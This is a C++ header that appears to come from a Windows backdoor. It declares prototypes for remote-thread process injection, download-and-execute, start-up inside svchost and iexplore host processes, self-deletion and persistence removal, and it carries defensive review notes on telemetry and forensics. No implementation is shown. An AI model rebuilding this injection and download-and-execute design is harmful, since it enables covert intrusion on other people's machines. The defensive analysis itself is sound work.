📄 tools.h
#pragma once
#include "..\vipshellinfo\vipshellcommand.h"
//#include "..\vipshellinfo\ByShellConfigStruct.h"
#include ".\startaggregate.h"
#include <windows.h>
#include <vector>
#include ".\opendesktop.h"
#include "usrlib.h"
#pragma comment(lib,"usrlib")
//typedef struct tagVipShellConfig
//{
// WCHAR szUrl[256];
// WCHAR szExplain[100];
//
// WCHAR szIp[256];
// WCHAR szIp_Port[100];
//
// WCHAR szURLDNS[32];
// WCHAR szInject[32];
//
// WCHAR szCfgFile[100];
//
//}VIPSHELLCONFIG, *LPVIPSHELLCONFIG;
// ---------------------------------------------------------------------------
// Host inventory, process enumeration and configuration helpers.
// Only prototypes are visible in this header. Every behavioural note below is
// inferred from names and signatures and must be confirmed against the
// implementation file. Return conventions mix `bool`, `BOOL` and `DWORD`, so
// check each one individually before relying on it.
// ---------------------------------------------------------------------------

// Presumably reports a CPU property packed into a DWORD (speed? count?) — TODO confirm.
DWORD GetCpuInfo();
// Writes OS major/minor version and platform id through the three out-pointers.
// NOTE(review): null-pointer handling for the out-parameters is not visible here.
BOOL GetServerEdition(DWORD* dwMajorVersion, DWORD* dwMinorVersion, DWORD* dwPlatformId);
// Presumably returns installed memory; the unit (bytes/KB/MB) is not visible — TODO confirm.
DWORD GetMemorySize();
// Presumably reports whether a capture device/window is available — TODO confirm.
bool IsCanCap();
// Returns a window handle; presumably the capture window looked for by IsCanCap().
HWND FindCapWnd();
// NOTE(review): name suggests this enables SeDebugPrivilege on the current
// process token — confirm. If so, a privilege adjustment followed by handle
// opens on other processes is a useful correlation point for detection.
bool enableDebugPriv();
// Resolves the image path for dwProcessId into the caller's buffer szPath.
// NOTE(review): szPath is LPTSTR, so the character width depends on the UNICODE
// build setting; whether dwbufflen counts bytes or characters is not visible
// here — verify, since a mismatch would allow a write past the buffer.
// The meaning of isGetPath (directory vs. full file name?) is not visible.
bool GetProcessFilePath(DWORD dwProcessId, LPTSTR szPath, DWORD dwbufflen, bool isGetPath);
// Fills *pVecTor with tagVipShellProcess records (type declared elsewhere,
// presumably in vipshellcommand.h). Meaning of the DWORD result (count? error
// code?) is not visible — TODO confirm.
DWORD GetProcessToVecTor(std::vector<tagVipShellProcess>* pVecTor);
// Looks up a process id by image name. The value returned when no process
// matches is not visible — callers must not assume 0 without checking.
DWORD GetProcessIdByName(LPCWSTR szName);
// Terminates the process identified by dwProcessId (presumably; confirm).
BOOL KillProcess(DWORD dwProcessId);
// Writes a path into p.
// NOTE(review): there is no buffer-length parameter, so the callee cannot bound
// the write; the required capacity (MAX_PATH wide chars?) must be confirmed and
// documented, or a length argument added in a new overload.
void GetExeFilePath(WCHAR* p);
// Loads this program's configuration; DelConfiger presumably requests deletion
// of the configuration source after reading — TODO confirm.
bool GetMyConfig(BOOL DelConfiger);
// Stores a description string; presumably the szExplain field of the
// commented-out VIPSHELLCONFIG layout above — TODO confirm.
bool SetMyExplain(LPCTSTR Explain);
// Function-pointer types whose shapes match the kernel32 exports LoadLibraryA,
// GetProcAddress, FreeLibrary, GetModuleHandleA and ExitProcess. All use
// __stdcall and the ANSI (LPCSTR) string variants. The first four are stored in
// tagThreadParam below; PExitProcess is not referenced anywhere else in this
// header.
typedef HINSTANCE (__stdcall *PLoadLibraryA)( LPCSTR );
typedef FARPROC (__stdcall *PGetProcAddress)( HMODULE, LPCSTR );
typedef BOOL (__stdcall *PFreeLibrary)( HINSTANCE );
typedef HINSTANCE (__stdcall *PGetModuleHandle)( LPCSTR );
typedef VOID (__stdcall *PExitProcess)(UINT);
// Parameter block holding four pre-resolved API addresses plus a DLL name and
// an exported-function name, both as fixed MAX_PATH ANSI buffers.
// NOTE(review): this layout looks like the argument block handed to code that
// runs in another process (see InjectRemote's pRemoteParam) — confirm against
// the implementation. Whoever fills szDllName/szFunctionName must bound the
// copy to MAX_PATH and guarantee NUL termination; nothing in this header
// enforces either.
typedef struct tagThreadParam
{
// Address used to load szDllName.
PLoadLibraryA pfnLoadLibraryA;
// Address used to resolve szFunctionName inside the loaded module.
PGetProcAddress pfnGetProcAddress;
// Address used to unload the module again.
PFreeLibrary pfnFreeLibrary;
// Address used to look up an already-loaded module.
PGetModuleHandle pfnGetModuleHandle;
// ANSI path or name of the DLL; capacity MAX_PATH chars including the NUL.
char szDllName[MAX_PATH];
// ANSI name of the export to call; capacity MAX_PATH chars including the NUL.
char szFunctionName[MAX_PATH];
}ThreadParam, *PThreadParam;
// Runs a caller-supplied routine and parameter block in the process behind
// hProcess (per the parameter names and the author's notes on dwMilliseconds).
//
// Parameters:
//   hProcess       - handle to the target process; the access rights it must
//                    carry are not visible in this header.
//   pfnRemoteFunc  - start of the routine to run; dwFuncSize is its size,
//                    presumably in bytes.
//   pRemoteParam   - parameter block for the routine (presumably a ThreadParam);
//                    dwParamSize is its size, presumably in bytes.
//   dwMilliseconds - wait time for the remote thread, see the notes below.
// Returns: a DWORD whose meaning (exit code? error code?) is not visible here.
//
// NOTE(review): for defenders, the telemetry that corresponds to this call is
// cross-process memory allocation/write followed by remote thread creation.
// When dwMilliseconds is 0 the remote allocations are left in place (author's
// note below), so they remain visible to memory forensics on the target process.
DWORD InjectRemote
(
HANDLE hProcess,
//DWORD PID,
void* pfnRemoteFunc,
DWORD dwFuncSize,
void* pRemoteParam,
DWORD dwParamSize,
DWORD dwMilliseconds
// Wait for the remote thread to finish. INFINITE: wait without limit, then free the remote thread's memory (for non-blocking routines).
// If 0, return immediately without waiting and do not free the remote thread's memory (for blocking routines).
);
// ---------------------------------------------------------------------------
// Remote execution, file download and launch helpers.
// Prototypes only; notes are inferred from names and signatures — confirm
// against the implementation. std::wstring is used below although <string> is
// not among the includes visible in this header, so it is presumably pulled in
// transitively; including it directly would be more robust.
// ---------------------------------------------------------------------------

// Wrapper that takes a process handle and an export name (szFnName, ANSI).
// Presumably fills a ThreadParam and calls InjectRemote — TODO confirm. The
// commented-out parameters show that a process id and a config pointer were
// once part of the signature.
void InjectHideMeRemote(HANDLE hProcess, /*DWORD dwProcessId,*/ /*LPVIPSHELLCONFIG lp,*/ LPCSTR szFnName);
// Presumably synthesises the Ctrl+Alt+Del key combination — TODO confirm.
void KeyDownCtrlAltDel();
// Launches szFile. szlp is presumably the command-line parameters and szDir the
// working directory; dwShow defaults to SW_SHOW.
// NOTE(review): nothing in the signature constrains or validates szFile.
bool RunFile(LPCWSTR szFile, LPCWSTR szlp = NULL, LPCWSTR szDir = NULL, DWORD dwShow = SW_SHOW);
// Fetches szUrl to the local path szPath; the optional pRet presumably receives
// a result or error string.
// NOTE(review): the signature carries no expected hash or signature, so any
// integrity check on the downloaded content would have to live in the
// implementation — verify. Paired with RunFile this forms a
// download-and-execute path worth covering with network and process telemetry.
bool DownFile(LPCWSTR szUrl, LPCWSTR szPath , std::wstring* pRet = NULL);
// Splits a full path; both out-pointers default to NULL, so each is optional.
// Presumably strName receives the file name and strPath the directory.
void GetNameByFullPath(LPCWSTR szFile, std::wstring* strName = NULL, std::wstring* strPath = NULL);
// Presumably starts a worker thread that downloads szUrl.
// NOTE(review): the lifetime of szUrl across the thread hand-off is not visible
// here; the implementation must copy the string before returning.
void CreateThreadDownFile(LPCWSTR szUrl);
// The next two have the DWORD WINAPI (LPVOID) shape of a CreateThread start
// routine. NOTE(review): the names suggest start-up paths associated with
// iexplore and svchost host processes — confirm; the expected type behind
// lpParameter is not visible.
DWORD WINAPI StartByShellIEXPLORE(LPVOID lpParameter);
DWORD WINAPI StartByShellSVCHOST(LPVOID lpParameter);
//DWORD WINAPI HideMyService(LPVOID lpParameter);
//
//typedef struct _FAKE_SERVICE_RECORD {
// struct _FAKE_SERVICE_RECORD *Prev; // linked list
// struct _FAKE_SERVICE_RECORD *Next; // linked list
// LPWSTR ServiceName; // points to service name
// LPWSTR DisplayName; //
//} FAKE_SERVICE_RECORD, *PFAKE_SERVICE_RECORD, *LPFAKE_SERVICE_RECORD;
//
//void SearchDWORD(int Addr,LPCTSTR HideServiceName);
// ---------------------------------------------------------------------------
// Uninstall / clean-up, shutdown and lookup helpers.
// Prototypes only; notes are inferred from names and signatures — confirm
// against the implementation.
// NOTE(review): the Remove* routines and SelfDelete appear to erase the
// program's own persistence and on-disk image. During incident response the
// corresponding evidence (service-control events, registry key changes, file
// deletion records) should be collected from logs rather than expected to
// remain on the live system.
// ---------------------------------------------------------------------------

// Thread start routine (DWORD WINAPI (LPVOID) shape); presumably drives the
// full removal sequence. The expected type behind lpParameter is not visible.
DWORD WINAPI RemoveServer(LPVOID lpParameter);//RemoveServer
// Presumably deletes the running executable's own file — TODO confirm.
BOOL SelfDelete();
// Presumably undoes a delayed-load persistence entry; the mechanism is not visible.
void RemoveDelayLoad(void);
// Presumably deletes an autostart "Run" registry value — TODO confirm which hive and key.
void RemoveRunKey(void);
// Removes the named service; presumably through the service control manager.
void RemoveService(LPCTSTR ServiceName);
// Removes the named service; presumably by deleting its registry entries
// directly instead of going through the service control manager.
void RemoveServiceByReg(LPCTSTR ServiceName);
// Shuts the system down; the meaning of Flag (reboot vs. power-off?) is not visible.
void ShutDownSystem(BOOL Flag);
// Look up a process by executable name; the meaning of the DWORD result (pid? count?)
// and how it differs from GetProcessIdByName are not visible — TODO confirm.
DWORD QueryProcessByName(LPCWSTR exename);
// Look up a window by name; the meaning of the DWORD result is not visible.
DWORD QueryWindowByName(LPCWSTR WindowName);
// Debug logging of an ANSI string.
// NOTE(review): the parameter is a non-const char*, so string literals cannot
// be passed cleanly; whether the callee modifies the buffer is not visible.
void dbglog(char* str);